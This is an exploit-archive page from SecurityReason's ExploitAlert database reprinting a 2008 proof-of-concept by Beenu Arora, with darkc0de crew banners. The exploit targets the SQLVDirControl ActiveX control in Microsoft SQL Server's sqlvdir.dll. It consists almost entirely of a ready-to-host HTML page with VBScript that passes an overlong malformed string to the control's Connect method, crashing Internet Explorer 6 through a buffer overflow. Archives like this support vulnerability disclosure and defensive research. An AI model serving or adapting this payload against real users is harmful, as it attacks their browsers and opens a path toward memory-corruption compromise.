|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 4651 Credit : Beenu Arora Date : 11.9.2008 Exploit Code : ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al # # ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE # # and all darkc0de members ---# ################################################################ # # Author: Beenu Arora # # Home : www.BeenuArora.com # # Email : beenudel1986@gmail.com # # Share the c0de! # ################################################################ # # sqlvdir.dll ActiveX Remote Buffer Overflow Exploit # # Successfull exploitation crashes the Browser # # Tested On : WinXp Sp-2 IE 6.0 # ################################################# # Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll # Class SQLVDirControl # GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} # Number of Interfaces: 1 # Default Interface: ISQLVDirControl # RegKey Safe for Script: False # RegkeySafe for Init: False # KillBitSet: False ################################################# <html> Test Exploit page <object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object> <script language='vbscript'> targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll" prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )" memberName = "Connect" progid = "SQLVDIRLib.SQLVDirControl" argCount = 2 arg1="defaultV" arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\te st\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\te s\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\te s\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\tes t\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test \te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\tes t\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\t test\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest \test\test\tes\test\test\tes\t\\\\\\\" target.Connect arg1 ,arg2 </script> |
||
| Alert | ||
Multiple Vendors libc/gdtoa printf(3) Array Overrun
SecurityReason realised new advisory about vulnerabilities libc/gdtoa... |
||
| Apache |  |
|
» Apache Tomcat |
||
» Apache Tomcat User |
||
| PHP | |
|
» PHP |
||
- 2009-05-30| Copyright © SecurityReason.com. All Rights Reserved. |